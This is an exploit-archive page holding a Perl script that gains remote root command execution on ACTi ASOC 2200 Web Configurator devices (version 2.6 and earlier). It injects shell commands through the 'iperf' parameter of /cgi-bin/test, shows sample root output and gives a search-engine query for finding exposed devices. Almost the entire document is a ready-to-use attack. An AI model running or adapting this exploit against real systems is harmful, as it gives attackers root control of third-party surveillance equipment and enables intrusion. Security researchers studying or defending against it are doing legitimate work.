ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
# Published : 2011-03-17
# Author : Todor Donev
# Previous Title : RealNetworks RealPlayer CDDA URI Initialization Vulnerability
# Next Title : Sun Java Applet2ClassLoader Remote Code Execution Exploit

#!perl
#  ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
##
#  Dicovery & Author: Todor Donev
#  Author mail: todor.donev@@gmail.com
#  Type: Hardware
#  Vuln Type and Risk: Remote / High
##
#  ACTi Corporation is the technology leader in IP surveillance,
#  focusing on multiple security surveillance market segments.
##
#  root@linux:~# perl actiroot.pl <CENSORED> 
#  [+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
#  [+] Gewgl: intitle:"Web Configurator - Version v2.6"
#  # id
#   execute : /sbin/iperf -c ;id  &
#   uid=0(root) gid=0(root)        ### Got Root ? o.O
##
#  Special kind regards to Tsvetelina Emirska that support me !! :) 
#
#  Prayers to all the People in Japan from Bulgaria !!!!! 
#
use LWP::Simple; 
print "[+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Executionn";
print "[+] Gewgl: intitle:"Web Configurator - Version v2.6"n";
$host = $ARGV[0];
$cmd = $ARGV[1];
if(! $ARGV[0]) {
print "[+] usage: perl actiroot.pl <host> <cmd>n";
exit;
}
if(! $ARGV[1]) {
$cmd = "id";
}
my $result = get("http://$host/cgi-bin/test?iperf=;$cmd &");
if (defined $result) {
print "# $cmdn $result";
}
else {
print "[-] Not Vulnerablen";
}